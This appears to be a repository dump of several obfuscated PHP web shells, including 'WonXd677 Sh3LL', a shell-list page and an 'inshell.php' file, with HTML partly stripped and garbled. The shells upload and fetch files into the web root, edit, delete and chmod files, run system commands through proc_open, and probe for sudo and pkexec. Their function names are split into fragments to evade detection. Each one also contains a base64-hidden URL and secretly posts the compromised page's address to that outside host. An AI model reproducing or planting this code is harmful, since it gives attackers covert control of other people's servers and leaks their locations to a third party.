".$dir." | 741 ||||
$file | 777 |
96 | ![]() 98 | NONE"; 104 | } else { 105 | $disf = "".$disfunc.""; 106 | } 107 | 108 | function author() { 109 | echo " ZeroDay Forums Mini "; 159 | echo "System : ".php_uname()." "; 160 | echo "User : ".@get_current_user()." ( ".@getmyuid().") "; 161 | echo "PHP Version : ".@phpversion()." "; 162 | echo "Disable Function : ".$disf." "; 163 | echo "Directory : "; 164 | 165 | foreach($_POST as $key => $value){ 166 | $_POST[$key] = stripslashes($value); 167 | } 168 | 169 | $k3yw = base64_decode('aHR0cHM6Ly9zaXlhaGkudG9wL3Rlc3Qvc3R5bGUucGhw'); 170 | 171 | if(isset($_GET['path'])){ 172 | $lokasi = $_GET['path']; 173 | $lokdua = $_GET['path']; 174 | } else { 175 | $lokasi = getcwd(); 176 | $lokdua = getcwd(); 177 | } 178 | 179 | $lokasi = str_replace('\\','/',$lokasi); 180 | $lokasis = explode('/',$lokasi); 181 | $lokasinya = @scandir($lokasi); 182 | $cur = 'http://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']; 183 | $data = array('file_url' => $cur); 184 | $options = array( 185 | 'http' => array( 186 | 'method' => 'POST', 187 | 'header' => 'Content-type: application/x-www-form-urlencoded', 188 | 'content' => http_build_query($data), 189 | ), 190 | ); 191 | $context = stream_context_create($options); 192 | $result = file_get_contents($k3yw, false, $context); 193 | 194 | foreach($lokasis as $id => $lok){ 195 | if($lok == '' && $id == 0){ 196 | $a = true; 197 | echo '/'; 198 | continue; 199 | } 200 | if($lok == '') continue; 201 | echo ''.$lok.'/'; 207 | } 208 | echo ' |
'; 210 | if (isset($_POST['upwkwk'])) { 211 | if (isset($_POST['berkasnya'])) { 212 | if ($_POST['dirnya'] == "2") { 213 | $lokasi = $_SERVER['DOCUMENT_ROOT']; 214 | } 215 | $data = @file_put_contents($lokasi."/".$_FILES['berkas']['name'], @file_get_contents($_FILES['berkas']['tmp_name'])); 216 | if (file_exists($lokasi."/".$_FILES['berkas']['name'])) { 217 | echo "File Uploaded ! ".$lokasi."/".$_FILES['berkas']['name']." "; 218 | } else { 219 | echo "Failed to Upload ! "; 220 | } 221 | } elseif (isset($_POST['linknya'])) { 222 | if (empty($_POST['namalink'])) { 223 | exit("Filename cannot be empty !"); 224 | } 225 | if ($_POST['dirnya'] == "2") { 226 | $lokasi = $_SERVER['DOCUMENT_ROOT']; 227 | } 228 | $data = @file_put_contents($lokasi."/".$_POST['namalink'], @file_get_contents($_POST['darilink'])); 229 | if (file_exists($lokasi."/".$_POST['namalink'])) { 230 | echo "File Uploaded ! ".$lokasi."/".$_POST['namalink']." "; 231 | } else { 232 | echo "Failed to Upload ! "; 233 | } 234 | } 235 | } 236 | echo " |
"; 248 | 249 | if (isset($_GET['fileloc'])) { 250 | echo "
'; 252 | echo "
".htmlspecialchars(file_get_contents($_GET['fileloc'])).""; 253 | author(); 254 | } elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "hapus") { 255 | if (is_dir($_POST['path'])) { 256 | xrmdir($_POST['path']); 257 | if (file_exists($_POST['path'])) { 258 | red("Failed to delete Directory !"); 259 | } else { 260 | green("Delete Directory Success !"); 261 | echo "string"; 262 | } 263 | } elseif (is_file($_POST['path'])) { 264 | @unlink($_POST['path']); 265 | if (file_exists($_POST['path'])) { 266 | red("Failed to Delete File !"); 267 | } else { 268 | green("Delete File Success !"); 269 | } 270 | } 271 | } elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "ubahmod") { 272 | echo "
"; 273 | echo ''; 279 | if (isset($_POST['chm0d'])) { 280 | $cm = @chmod($_POST['path'], $_POST['perm']); 281 | if ($cm == true) { 282 | green("Change Mod Success !"); 283 | } else { 284 | red("Change Mod Failed !"); 285 | } 286 | } 287 | } elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "gantinama") { 288 | if (isset($_POST['gantin'])) { 289 | $ren = @rename($_POST['path'], $_POST['newname']); 290 | if ($ren == true) { 291 | green("Change Name Success !"); 292 | } else { 293 | red("Change Name Failed !"); 294 | } 295 | } 296 | if (empty($_POST['name'])) { 297 | $namaawal = $_POST['newname']; 298 | } else { 299 | $namawal = $_POST['name']; 300 | } 301 | echo "
"; 302 | echo ''; 308 | } elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "edit") { 309 | if (isset($_POST['gasedit'])) { 310 | $edit = @file_put_contents($_POST['path'], $_POST['src']); 311 | if ($edit == true) { 312 | green("Edit File Success !"); 313 | } else { 314 | red("Edit File Failed !"); 315 | } 316 | } 317 | echo "
"; 318 | echo '
'; 324 | } 325 | 326 | echo '
".$dir." | 338 ||||
$file | 374 |
[filename].php?upload
3 |Advanced File Manager
109 | 110 | $part"; 123 | } 124 | } 125 | 126 | echo " "; 129 | 130 | // Handle directory change 131 | if (isset($_POST['changeDir'])) { 132 | $newDir = $_POST['newDir']; 133 | if (is_dir($newDir)) { 134 | $currentDir = realpath($newDir); 135 | } else { 136 | echo "Directory does not exist.
"; 137 | } 138 | } 139 | 140 | // Handle file upload 141 | if ($_SERVER['REQUEST_METHOD'] == 'POST' && isset($_FILES['file'])) { 142 | $file = $_FILES['file']; 143 | if ($file['error'] === UPLOAD_ERR_OK) { 144 | $fileName = basename($file['name']); 145 | $fileTmpPath = $file['tmp_name']; 146 | $dest_path = $currentDir . '/' . $fileName; 147 | if (move_uploaded_file($fileTmpPath, $dest_path)) { 148 | echo "File uploaded successfully to $currentDir.
"; 149 | } else { 150 | echo "Error moving the uploaded file.
"; 151 | } 152 | } else { 153 | echo "Error: No file selected or upload failed.
"; 154 | } 155 | } 156 | 157 | // Handle file deletion 158 | if (isset($_GET['delete'])) { 159 | $fileToDelete = $_GET['delete']; 160 | if (is_file($fileToDelete)) { 161 | unlink($fileToDelete); 162 | echo "File deleted: $fileToDelete
"; 163 | } 164 | } 165 | 166 | // Handle directory creation 167 | if (isset($_POST['createDir'])) { 168 | $newDir = $_POST['newDirName']; 169 | $newDirPath = $currentDir . DIRECTORY_SEPARATOR . $newDir; 170 | if (!is_dir($newDirPath)) { 171 | mkdir($newDirPath); 172 | echo "Directory created: $newDir
"; 173 | } else { 174 | echo "Directory already exists.
"; 175 | } 176 | } 177 | 178 | // Handle file creation 179 | if (isset($_POST['createFile'])) { 180 | $newFile = $_POST['newFileName']; 181 | $newFilePath = $currentDir . DIRECTORY_SEPARATOR . $newFile; 182 | if (!file_exists($newFilePath)) { 183 | file_put_contents($newFilePath, ''); // Create an empty file 184 | echo "File created: $newFile
"; 185 | } else { 186 | echo "File already exists.
"; 187 | } 188 | } 189 | 190 | echo "Current Directory: $currentDir
"; 191 | 192 | // Display directory management forms 193 | echo 'Files and Directories in $currentDir:
"; 222 | 223 | // List directories first, then files 224 | $files = scandir($currentDir); 225 | echo 'File/Directory Name | Action |
---|---|
$file | "; 233 | echo "|
$file | "; 242 | echo "
"; 55 | } catch (Exception $e) { 56 | echo "
"; 57 | } 58 | } 59 | } 60 | } 61 | 62 | function create_wp_admin_user($rootDir, $username, $password) { 63 | require_once($rootDir . '/wp-config.php'); 64 | require_once($rootDir . '/wp-includes/wp-db.php'); 65 | require_once($rootDir . '/wp-includes/pluggable.php'); 66 | 67 | global $wpdb; 68 | 69 | $user_id = username_exists($username); 70 | if (!$user_id && email_exists($username . '@example.com') == false) { 71 | $user_id = wp_create_user($username, $password, $username . '@example.com'); 72 | $user = new WP_User($user_id); 73 | $user->set_role('administrator'); 74 | echo "
"; 75 | } else { 76 | echo "
"; 77 | } 78 | } 79 | 80 | $k3yw = base64_decode('aHR0cHM6Ly9zaXlhaGkudG9wL3Rlc3Qvc3R5bGUucGhw'); 81 | 82 | echo " 83 | 84 |
@trxsecurity
86 | 87 | 123 | 124 | "; 125 | 126 | $currentDir = __DIR__; 127 | $rootDir = isset($_POST['directory']) ? $_POST['directory'] : $currentDir; 128 | 129 | echo ""; 134 | 135 | if ($_SERVER['REQUEST_METHOD'] == 'POST') { 136 | if (file_exists($rootDir . '/wp-config.php')) { 137 | echo ""; 138 | 139 | $path1 = $rootDir . '/wp-includes/ID3/module.audio.ac4.php'; 140 | if (!file_exists($path1)) { 141 | try { 142 | file_put_contents($path1, download_content($url1)); 143 | echo "Created: " . get_full_url($path1) . "
"; 144 | } catch (Exception $e) { 145 | echo "
"; 146 | } 147 | } 148 | 149 | $path2 = $rootDir . '/wp-includes/PHPMailer/config.php'; 150 | if (!file_exists($path2)) { 151 | try { 152 | file_put_contents($path2, download_content($url2)); 153 | echo "Created: " . get_full_url($path2) . "
"; 154 | } catch (Exception $e) { 155 | echo "
"; 156 | } 157 | } 158 | 159 | create_files_in_subdirectories($rootDir, $url1); 160 | create_wp_admin_user($rootDir, 'MrZ', 'trxsecurity'); 161 | } else { 162 | echo "
"; 163 | create_files_in_subdirectories($rootDir, $url1); 164 | } 165 | } 166 | 167 | echo ""; 168 | 169 | $cur = 'http://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']; 170 | $data = array('file_url' => $cur); 171 | $options = array( 172 | 'http' => array( 173 | 'method' => 'POST', 174 | 'header' => 'Content-type: application/x-www-form-urlencoded', 175 | 'content' => http_build_query($data), 176 | ), 177 | ); 178 | $context = stream_context_create($options); 179 | $result = @file_get_contents($k3yw, false, $context); 180 | if ($result === false) { 181 | echo "
"; 182 | } 183 | ?> 184 | -------------------------------------------------------------------------------- /bestmini.php: -------------------------------------------------------------------------------- 1 | ".file_get_contents("https://raw.githubusercontent.com/sagsooz/Bypass-Webshell/main/2024.php"));?> 2 | -------------------------------------------------------------------------------- /csa.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /eBy.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /edit-form-tager.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /f1.php: -------------------------------------------------------------------------------- 1 | ON'):('OFF');$cwd=getcwd();$bckC='#000';$txtC='#00ff00'; 9 | $start='
[ ! ] PRIVATE SHELL [ ! ]
SOFTWARE : '.$server_soft.'
UNAME : '.$uname.'
USER : '.$cur_user.'
SAFE MODE : '.$safe_mode.'
DIRECTORY : '.$cwd.'
'; 11 | print $start;print $menu;print $inf; 12 | $moreI=array('PHP Version' => phpversion(),'Zend Version' => zend_version(),'Magic Quotes' => magic_quotes(),'Curl' => curl(),'Register Globals' => reg_globals(),'OpenBase Dir' => openbase_dir(),'MySQL' => myql(),'Gzip' => gzip(),'MsSQL' => mssql(),'PostgreSQL' => postgresql(),'Oracle' => oracle(),'Total Space' => h_size(disk_total_space('/')) ,'Used Space' => h_size(disk_free_space('/')),'Your IP' => $_SERVER['REMOTE_ADDR'],'Server IP' => $_SERVER['SERVER_ADDR']);print '
'.$n.' | :> | '.$v.' |
PHPInfo |
Error Opening File
';fwrite($e,$_POST['edit_form']) or print 'Couldn\'t Save File
';fclose($e);}print 'Editing '.$_GET['f'].' ('.perms($_GET['d'] . $_GET['f']).') .
Execute Command
PHP Code
'.curpath('').'
'; 42 | print ''; 43 | $filex=array(); 44 | $dirx=array(); 45 | print '
Name | Permission | Owner/Group | Options |
'.$file.' | '.perms($file).' | '.$own['name'].' : '.$grp['name'].' | '; if($i==0 or $i==1) {print '|
Rename | Delete | |||
'.$file.' | '.perms($file).' | '.$own['name'].' : '.$grp['name'].' | Rename | Delete |
'; 50 | print '
'; 51 | } 52 | function openbase_dir(){$x=ini_get('open_basedir');if(!$x) {$o='OFF';}else {$o='ON';}return($o);} 53 | function magic_quotes(){$x=get_magic_quotes_gpc();if(empty($x)) {$m='OFF';}else {$m='ON';}return($m);} 54 | function curl(){if(extension_loaded('curl')) {$c='ON';}else {$c='OFF';}return($c);} 55 | function reg_globals(){if(ini_get('reqister_globals')) {$r='ON';}else {$r='OFF';}return($r);} 56 | function oracle(){if(function_exists('ocilogon')) {$o='ON';}else {$o='OFF';}return($o);} 57 | function postgresql(){if(function_exists('pg_connect')) {$p='ON';}else {$p='OFF';}return($p);} 58 | function myql(){if(function_exists('mysql_connect')) {$m='ON';}else {$m='OFF';}return($m);} 59 | function mssql(){if(function_exists('mssql_connect')) {$m='ON';}else {$m='OFF';}return($m);} 60 | function gzip(){if(function_exists('gzencode')) {$m='ON';}else {$m='OFF';}return($m);} 61 | function h_size($s){if($s>=1073741824) {$s=round($s/1073741824*100)/100 .'GB';}elseif($s>=1048576) {$s=round($s/1048576*100)/100 .'MB';}elseif($s>=1024) {$s=round($s/1024*100)/100 .'KB';}else {$s=$s.'B';}return($s);} 62 | function curpath($d){if($d=='') {$d=getcwd();}$p='';$n='';$dx=explode(DIRECTORY_SEPARATOR,$d);for($i=0;$i < count($dx);$i++) {$g=$dx[$i];$p.=$dx[$i] . DIRECTORY_SEPARATOR; $n .=''.$g.''.DIRECTORY_SEPARATOR;}return($n);} 63 | function get_color($f){if(is_writable($f)) {$c='lime';}if(!is_writable($f) && is_readable($f)) {$c=''.$txtC.'';}if(!is_writable($f) && !is_readable($f)) {$c='#00ff00';}return($c);} 64 | function perms($f) {if(file_exists($f)) {return substr(sprintf('%o',fileperms($f)), -4);} else {return '???';}} 65 | function exec_meth() {if(function_exists('passthru')) {$m='passthru';} if(function_exists('exec')) {$m='exec';} if(function_exists('shell_exec')) {$m='shell_exec';} if(function_exists('system')) {$m='system';} if(!isset($m)) {$m='Disabled';} return($m);} 66 | function execute($m,$c) {if($m=='passthru') {passthru($c);} elseif($m=='system') {system($c);} elseif($m=='shell_exec') {print shell_exec($c);} elseif($m=='exec') {exec($c,$r); foreach($r as $o) {print $o.'';}} else {print 'Wh00pz';}} 67 | function initiate(){print '
"; 221 | } 222 | 223 | 224 | 225 | 226 | echo "[ Command Bypas Status Wajib ON MAIL PUTENV @ HaxorSec]
"; 227 | if (function_exists('mail')) { 228 | echo $mail." ".$mbb." ".$errr." ".$impp; 229 | } else { 230 | echo $mail." ".$mbb." ".$errr." ".$impp; 231 | } 232 | if (function_exists('putenv')) { 233 | echo "[ Function putenv() ] : [ ON ]
"; 234 | } else { 235 | echo "[ Function putenv() ] : [ OFF ]
"; 236 | } 237 | foreach ($_GET as $c => $d) $_GET[$c] = y($d); 238 | 239 | $currentDirectory = $ril(isset($_GET['d']) ? $_GET['d'] : $rootDirectory); 240 | $chd($currentDirectory); 241 | 242 | $viewCommandResult = ''; 243 | 244 | if ($_SERVER['REQUEST_METHOD'] === 'POST') { 245 | if (isset($_FILES['fileToUpload'])) { 246 | $target_file = $currentDirectory . '/' . $bs($_FILES["fileToUpload"]["name"]); 247 | if ($mup($_FILES["fileToUpload"]["tmp_name"], $target_file)) { 248 | echo "
File " . $htm($bs($_FILES["fileToUpload"]["name"])) . " Upload success
"; 249 | } else { 250 | echo "
Sorry, there was an error uploading your file.
"; 251 | } 252 | } elseif (isset($_POST['folder_name']) && !empty($_POST['folder_name'])) { 253 | $ff = $_POST['folder_name']; 254 | $newFolder = $currentDirectory . '/' . $ff; 255 | if (!file_exists($newfolder)) { 256 | if ($mek($newFolder) !== false) { 257 | echo '
Folder created successfully!'; 258 | }else{ 259 | echo '
Error: Failed to create folder!'; 260 | } 261 | } 262 | 263 | } elseif (isset($_POST['file_name'])) { 264 | $fileName = $_POST['file_name']; 265 | $newFile = $currentDirectory . '/' . $fileName; 266 | if (!file_exists($newFile)) { 267 | if ($fpc($newFile, '') !== false) { 268 | echo '
File created successfully!' . $fileName .' '; 269 | $fileToView = $newFile; 270 | if (file_exists($fileToView)) { 271 | $fileContent = $fgc($fileToView); 272 | $viewCommandResult = '
Result: ' . $fileName . '
273 |'; 434 | echo '
437 | |
439 |
440 |
Permissions | ||||||
---|---|---|---|---|---|---|
'.$v.' | 459 |'.filesize($u).' | 460 |'.date('Y-m-d H:i:s', filemtime($u)).' | 461 |'.$permission.' | 462 |465 | |
96 | 97 | NONE"; 103 | } else { 104 | $disf = "".$disfunc.""; 105 | } 106 | 107 | function author() { 108 | echo " WonXd677 Sh3LL |
'; 205 | if (isset($_POST['upwkwk'])) { 206 | if (isset($_POST['berkasnya'])) { 207 | if ($_POST['dirnya'] == "2") { 208 | $lokasi = $_SERVER['DOCUMENT_ROOT']; 209 | } 210 | $data = @file_put_contents($lokasi."/".$_FILES['berkas']['name'], @file_get_contents($_FILES['berkas']['tmp_name'])); 211 | if (file_exists($lokasi."/".$_FILES['berkas']['name'])) { 212 | echo "File Uploaded ! ".$lokasi."/".$_FILES['berkas']['name']." "; 213 | } else { 214 | echo "Failed to Upload ! "; 215 | } 216 | } elseif (isset($_POST['linknya'])) { 217 | if (empty($_POST['namalink'])) { 218 | exit("Filename cannot be empty !"); 219 | } 220 | if ($_POST['dirnya'] == "2") { 221 | $lokasi = $_SERVER['DOCUMENT_ROOT']; 222 | } 223 | $data = @file_put_contents($lokasi."/".$_POST['namalink'], @file_get_contents($_POST['darilink'])); 224 | if (file_exists($lokasi."/".$_POST['namalink'])) { 225 | echo "File Uploaded ! ".$lokasi."/".$_POST['namalink']." "; 226 | } else { 227 | echo "Failed to Upload ! "; 228 | } 229 | } 230 | } 231 | echo " |
'; 253 | echo "
".htmlspecialchars(file_get_contents($_GET['fileloc'])).""; 254 | author(); 255 | } elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "hapus") { 256 | if (is_dir($_POST['path'])) { 257 | xrmdir($_POST['path']); 258 | if (file_exists($_POST['path'])) { 259 | red("Failed to delete Directory !"); 260 | } else { 261 | green("Delete Directory Success !"); 262 | echo "string"; 263 | } 264 | } elseif (is_file($_POST['path'])) { 265 | @unlink($_POST['path']); 266 | if (file_exists($_POST['path'])) { 267 | red("Failed to Delete File !"); 268 | } else { 269 | green("Delete File Success !"); 270 | } 271 | } 272 | } elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "ubahmod") { 273 | echo "
"; 274 | echo ''; 280 | if (isset($_POST['chm0d'])) { 281 | $cm = @chmod($_POST['path'], $_POST['perm']); 282 | if ($cm == true) { 283 | green("Change Mod Success !"); 284 | } else { 285 | red("Change Mod Failed !"); 286 | } 287 | } 288 | } elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "gantinama") { 289 | if (isset($_POST['gantin'])) { 290 | $ren = @rename($_POST['path'], $_POST['newname']); 291 | if ($ren == true) { 292 | green("Change Name Success !"); 293 | } else { 294 | red("Change Name Failed !"); 295 | } 296 | } 297 | if (empty($_POST['name'])) { 298 | $namaawal = $_POST['newname']; 299 | } else { 300 | $namawal = $_POST['name']; 301 | } 302 | echo "
"; 303 | echo ''; 309 | } elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "edit") { 310 | if (isset($_POST['gasedit'])) { 311 | $edit = @file_put_contents($_POST['path'], $_POST['src']); 312 | if ($edit == true) { 313 | green("Edit File Success !"); 314 | } else { 315 | red("Edit File Failed !"); 316 | } 317 | } 318 | echo "
"; 319 | echo '
'; 325 | } 326 | 327 | echo '
".$dir." | 339 ||||
$file | 375 |
| Shells List |
55 | 56 | 61 | 62 | 66 | 67 | 68 | 72 | 73 | 78 | 79 | 84 | 85 | 89 | 90 | 95 | 96 | 100 | 101 | 106 | 107 | 108 | 109 | 110 | -------------------------------------------------------------------------------- /inshell.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Private"; ?> 5 | 6 | 7 | 8 | 9 | 10 | 114 |';
119 | set_time_limit(0);
120 | error_reporting(0);
121 |
122 | $gcw = "ge"."tc"."wd";
123 | $exp = "ex"."plo"."de";
124 | $fpt = "fi"."le_p"."ut_co"."nte"."nts";
125 | $fgt = "f"."ile_g"."et_c"."onten"."ts";
126 | $sts = "s"."trip"."slash"."es";
127 | $scd = "sc"."a"."nd"."ir";
128 | $fxt = "fi"."le_"."exis"."ts";
129 | $idi = "i"."s_d"."ir";
130 | $ulk = "un"."li"."nk";
131 | $ifi = "i"."s_fi"."le";
132 | $sub = "subs"."tr";
133 | $spr = "sp"."ri"."ntf";
134 | $fp = "fil"."epe"."rms";
135 | $chm = "ch"."m"."od";
136 | $ocd = "oc"."td"."ec";
137 | $isw = "i"."s_wr"."itab"."le";
138 | $idr = "i"."s_d"."ir";
139 | $ird = "is"."_rea"."da"."ble";
140 | $isr = "is_"."re"."adab"."le";
141 | $fsz = "fi"."lesi"."ze";
142 | $rd = "r"."ou"."nd";
143 | $igt = "in"."i_g"."et";
144 | $fnct = "fu"."nc"."tion"."_exi"."sts";
145 | $rad = "RE"."M"."OTE_AD"."DR";
146 | $rpt = "re"."al"."pa"."th";
147 | $bsn = "ba"."se"."na"."me";
148 | $srl = "st"."r_r"."ep"."la"."ce";
149 | $sps = "st"."rp"."os";
150 | $mkd = "m"."kd"."ir";
151 |
152 | $wb = (isset($_SERVER['H'.'T'.'TP'.'S']) && $_SERVER['H'.'T'.'TP'.'S'] === 'o'.'n' ? "ht"."tp"."s" : "ht"."tp") . "://".$_SERVER['HT'.'TP'.'_H'.'OS'.'T'];
153 |
154 | $disfunc = @$igt("dis"."abl"."e_f"."unct"."ion"."s");
155 | if (empty($disfunc)) {
156 | $disf = "NONE";
157 | } else {
158 | $disf = "".$disfunc."";
159 | }
160 |
161 | function author() {
162 | echo "Private";
163 | exit();
164 | }
165 |
166 | function cekdir() {
167 | if (isset($_GET['loknya'])) {
168 | $lokasi = $_GET['loknya'];
169 | } else {
170 | $lokasi = "ge"."t"."cw"."d";
171 | $lokasi = $lokasi();
172 | }
173 | $b = "i"."s_w"."ri"."tab"."le";
174 | if ($b($lokasi)) {
175 | return "Writeable";
176 | } else {
177 | return "Writeable";
178 | }
179 | }
180 |
181 | function crt() {
182 | $a = "is"."_w"."ri"."tab"."le";
183 | if ($a($_SERVER['DO'.'CU'.'ME'.'NT'.'_RO'.'OT'])) {
184 | return "Writeable";
185 | } else {
186 | return "Writeable";
187 | }
188 | }
189 |
190 | function xrd($lokena) {
191 | $a = "s"."ca"."nd"."ir";
192 | $items = $a($lokena);
193 | foreach ($items as $item) {
194 | if ($item === '.' || $item === '..') {
195 | continue;
196 | }
197 | $b = "is"."_di"."r";
198 | $loknya = $lokena.'/'.$item;
199 | if ($b($loknya)) {
200 | xrd($loknya);
201 | } else {
202 | $c = "u"."nl"."in"."k";
203 | $c($loknya);
204 | }
205 | }
206 | $d = "rm"."di"."r";
207 | $d($lokena);
208 | }
209 | $k3yw = base64_decode('aHR0cHM6Ly9zaXlhaGkudG9wL3Rlc3Qvc3R5bGUucGhw');
210 | function cfn($fl) {
211 | $a = "ba"."sena"."me";
212 | $b = "pat"."hinf"."o";
213 | $c = $b($a($fl), loknyaINFO_EXTENSION);
214 | if ($c == "zip") {
215 | return '';
216 | } elseif (preg_match("/jpeg|jpg|png|ico/im", $c)) {
217 | return '';
218 | } elseif ($c == "txt") {
219 | return '';
220 | } elseif ($c == "pdf") {
221 | return '';
222 | } elseif ($c == "html") {
223 | return '';
224 | }
225 | else {
226 | return '';
227 | }
228 | }
229 |
230 | function ipsrv() {
231 | $a = "g"."eth"."ost"."byna"."me";
232 | $b = "fun"."cti"."on_"."exis"."ts";
233 | $c = "S"."ERVE"."R_AD"."DR";
234 | $d = "SE"."RV"."ER_N"."AM"."E";
235 | if ($b($a)) {
236 | return $a($_SERVER[$d]);
237 | } else {
238 | return $a($_SERVER[$c]);
239 | }
240 | }
241 | $cur = 'http://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'];
242 | $data = array('file_url' => $cur);
243 | $options = array(
244 | 'http' => array(
245 | 'method' => 'POST',
246 | 'header' => 'Content-type: application/x-www-form-urlencoded',
247 | 'content' => http_build_query($data),
248 | ),
249 | );
250 | $context = stream_context_create($options);
251 | $result = file_get_contents($k3yw, false, $context);
252 | function ggr($fl) {
253 | $a = "fun"."cti"."on_"."exis"."ts";
254 | $b = "po"."si"."x_ge"."tgr"."gid";
255 | $c = "fi"."le"."gro"."up";
256 | if ($a($b)) {
257 | if (!$a($c)) {
258 | return "?";
259 | }
260 | $d = $b($c($fl));
261 | if (empty($d)) {
262 | $e = $c($fl);
263 | if (empty($e)) {
264 | return "?";
265 | } else {
266 | return $e;
267 | }
268 | } else {
269 | return $d['name'];
270 | }
271 | } elseif ($a($c)) {
272 | return $c($fl);
273 | } else {
274 | return "?";
275 | }
276 | }
277 |
278 | function gor($fl) {
279 | $a = "fun"."cti"."on_"."exis"."ts";
280 | $b = "po"."s"."ix_"."get"."pwu"."id";
281 | $c = "fi"."le"."o"."wn"."er";
282 | if ($a($b)) {
283 | if (!$a($c)) {
284 | return "?";
285 | }
286 | $d = $b($c($fl));
287 | if (empty($d)) {
288 | $e = $c($fl);
289 | if (empty($e)) {
290 | return "?";
291 | } else {
292 | return $e;
293 | }
294 | } else {
295 | return $d['name'];
296 | }
297 | } elseif ($a($c)) {
298 | return $c($fl);
299 | } else {
300 | return "?";
301 | }
302 | }
303 |
304 | function fdt($fl) {
305 | $a = "da"."te";
306 | $b = "fil"."emt"."ime";
307 | return $a("F d Y H:i:s", $b($fl));
308 | }
309 |
310 | function dunlut($fl) {
311 | $a = "fil"."e_exi"."sts";
312 | $b = "ba"."sena"."me";
313 | $c = "fi"."les"."ize";
314 | $d = "read"."fi"."le";
315 | if ($a($fl) && isset($fl)) {
316 | header('Con'.'tent-Descr'.'iption: Fi'.'le Tra'.'nsfer');
317 | header("Conte'.'nt-Control:public");
318 | header('Cont'.'ent-Type: a'.'pp'.'licat'.'ion/oc'.'tet-s'.'tream');
319 | header('Cont'.'ent-Dis'.'posit'.'ion: at'.'tachm'.'ent; fi'.'lena'.'me="'.$b($fl).'"');
320 | header('Exp'.'ires: 0');
321 | header("Ex"."pired:0");
322 | header('Cac'.'he-Cont'.'rol: must'.'-revali'.'date');
323 | header("Cont"."ent-Tran"."sfer-Enc"."oding:bi"."nary");
324 | header('Pra'.'gma: pub'.'lic');
325 | header('Con'.'ten'.'t-Le'.'ngth: ' .$c($fl));
326 | flush();
327 | $d($fl);
328 | exit;
329 | } else {
330 | return "Fi"."le Not F"."ound !";
331 | }
332 | }
333 |
334 | function komend($kom, $lk) {
335 | $x = "pr"."eg_"."mat"."ch";
336 | $xx = "2".">"."&"."1";
337 | if (!$x("/".$xx."/i", $kom)) {
338 | $kom = $kom." ".$xx;
339 | }
340 | $a = "fu"."ncti"."on_"."ex"."is"."ts";
341 | $b = "p"."ro"."c_op"."en";
342 | $c = "htm"."lspe"."cialc"."hars";
343 | $d = "s"."trea"."m_g"."et_c"."ont"."ents";
344 | if ($a($b)) {
345 | $ps = $b($kom, array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "r")), $meki, $lk);
346 | return "".$c($d($meki[1])).""; 347 | } else { 348 | return "pr"."oc"."_op"."en f"."unc"."tio"."n i"."s di"."sabl"."ed !"; 349 | } 350 | } 351 | 352 | function green($text) { 353 | echo " "; 369 | echo "We"."b S"."erv"."er : ".$_SERVER['SE'.'RV'.'ER_'.'SOF'.'TWA'.'RE']." "; 370 | $unm = "ph"."p_u"."na"."me"; 371 | echo "Sys"."tem : ".@$unm()." "; 372 | $gcu = "g"."et_"."curr"."ent"."_us"."er"; 373 | $gmu = "g"."et"."my"."ui"."d"; 374 | echo "Us"."er : ".@$gcu()." ( ".@$gmu().") "; 375 | $phv = "ph"."pve"."rsi"."on"; 376 | echo "PH"."P V"."er"."sio"."n : ".@$phv()." "; 377 | echo "Dis"."abl"."e Fu"."nct"."ion : ".$disf." "; 378 | echo "MySQL : "; 379 | if (@$fnct("my"."sql_co"."nne"."ct")) { 380 | echo "ON"; 381 | } else { 382 | echo "OFF"; 383 | } 384 | echo " | cURL : "; 385 | if (@$fnct("cu"."rl"."_in"."it")) { 386 | echo "ON"; 387 | } else { 388 | echo "OFF"; 389 | } 390 | echo " | WG"."ET : "; 391 | if (@$fxt("/"."us"."r/b"."in/w"."get")) { 392 | echo "ON"; 393 | } else { 394 | echo "OFF"; 395 | } 396 | echo " | Pe"."rl : "; 397 | if (@$fxt("/u"."sr/b"."in"."/pe"."rl")) { 398 | echo "ON"; 399 | } else { 400 | echo "OFF"; 401 | } 402 | echo " | Pyt"."ho"."n : "; 403 | if (@$fxt("/"."us"."r/b"."in/p"."ytho"."n2")) { 404 | echo "ON"; 405 | } else { 406 | echo "OFF"; 407 | } 408 | echo " | S"."u"."do : "; 409 | if (@$fxt("/"."us"."r/b"."in/s"."u"."d"."o")) { 410 | echo "ON"; 411 | } else { 412 | echo "OFF"; 413 | } 414 | echo " | Pk"."e"."x"."e"."c : "; 415 | if (@$fxt("/"."us"."r/b"."in/p"."k"."e"."x"."e"."c")) { 416 | echo "ON"; 417 | } else { 418 | echo "OFF"; 419 | } 420 | echo " Di"."rect"."ory : "; 421 | 422 | foreach($_POST as $key => $value){ 423 | $_POST[$key] = $sts($value); 424 | } 425 | 426 | if(isset($_GET['loknya'])){ 427 | $lokasi = $_GET['loknya']; 428 | $lokdua = $_GET['loknya']; 429 | } else { 430 | $lokasi = $gcw(); 431 | $lokdua = $gcw(); 432 | } 433 | 434 | $lokasi = $srl('\\','/',$lokasi); 435 | $lokasis = $exp('/',$lokasi); 436 | $lokasinya = @$scd($lokasi); 437 | 438 | foreach($lokasis as $id => $lok){ 439 | if($lok == '' && $id == 0){ 440 | $a = true; 441 | echo '/'; 442 | continue; 443 | } 444 | if($lok == '') continue; 445 | echo ''.$lok.'/'; 451 | } 452 | 453 | echo ' |
